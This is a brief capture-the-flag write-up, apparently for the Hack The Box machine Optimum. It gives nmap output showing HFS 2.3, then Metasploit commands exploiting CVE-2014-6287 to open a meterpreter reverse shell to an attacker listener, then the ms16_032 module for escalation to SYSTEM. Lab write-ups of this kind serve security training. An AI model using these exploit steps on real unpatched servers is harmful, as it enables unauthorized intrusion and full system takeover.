Basic information

Port scan

Only port 80 is open:

$ nmap -sC -sV 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 14:00 CST
Nmap scan report for 10.10.10.8
Host is up (0.071s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.89 seconds

80

The service is HFS 2.3:

A search turns up a related vulnerability:

CVE-2014-6287

Exploit it directly with msf in one shot:

use exploit/windows/http/rejetto_hfs_exec
set rhosts 10.10.10.8
set lhost 10.10.14.5
exploit

meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows

user flag

user.txt is on the current user's desktop:

Privilege escalation information

Gather the information directly with msf:

use post/multi/recon/local_exploit_suggester

The result is ms16-032:

ms16_032

Again exploit it with msf in one shot, which gives a SYSTEM shell:

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

root flag

root.txt is on the Administrator user's desktop:

References